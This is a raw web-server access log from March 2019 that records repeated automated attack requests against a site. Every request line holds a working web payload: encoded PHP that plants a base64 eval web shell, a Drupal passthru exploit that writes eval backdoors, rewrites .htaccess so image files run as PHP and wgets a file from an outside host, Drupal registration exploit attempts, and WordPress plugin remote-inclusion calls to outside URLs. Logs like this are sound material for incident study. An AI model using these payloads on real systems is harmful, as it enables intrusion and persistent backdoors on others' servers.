2019-03-28T10:50:48+01:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-28T10:51:22+01:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-28T10:51:27+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-28T10:51:52+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-28T10:52:05+01:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-28T10:52:14+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-28T10:52:24+01:00 POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-03-28T10:52:25+01:00 GET /shop HTTP/1.1
2019-03-28T10:53:09+01:00 POST //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-03-28T10:53:15+01:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-28T10:53:21+01:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-28T10:53:23+01:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-28T10:53:25+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-28T10:53:41+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-30T05:42:28+01:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-30T05:42:32+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-30T05:42:34+01:00 GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-03-30T05:42:34+01:00 GET /shop HTTP/1.1
2019-03-30T05:42:36+01:00 GET //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-03-30T05:42:41+01:00 GET //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-30T05:42:43+01:00 GET //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-30T05:42:44+01:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-30T05:42:45+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-30T05:42:49+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-30T05:42:51+01:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-30T05:42:52+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-30T05:42:57+01:00 POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-03-30T05:42:58+01:00 GET /shop HTTP/1.1
2019-03-30T05:43:01+01:00 POST //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-03-30T05:43:04+01:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-30T05:43:05+01:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-03-30T05:43:07+01:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-30T05:43:14+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-30T05:43:24+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-30T05:43:39+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-30T05:43:43+01:00 GET //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-03-30T05:43:56+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-30T05:43:59+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-30T05:44:00+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-30T05:44:03+01:00 POST //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-03-30T05:44:11+01:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-03-30T05:44:13+01:00 GET ///webconfig.txt.php HTTP/1.1
2019-03-30T05:44:15+01:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-03-30T05:44:18+01:00 GET //webconfig.txt.php HTTP/1.1
2019-03-30T05:44:20+01:00 GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1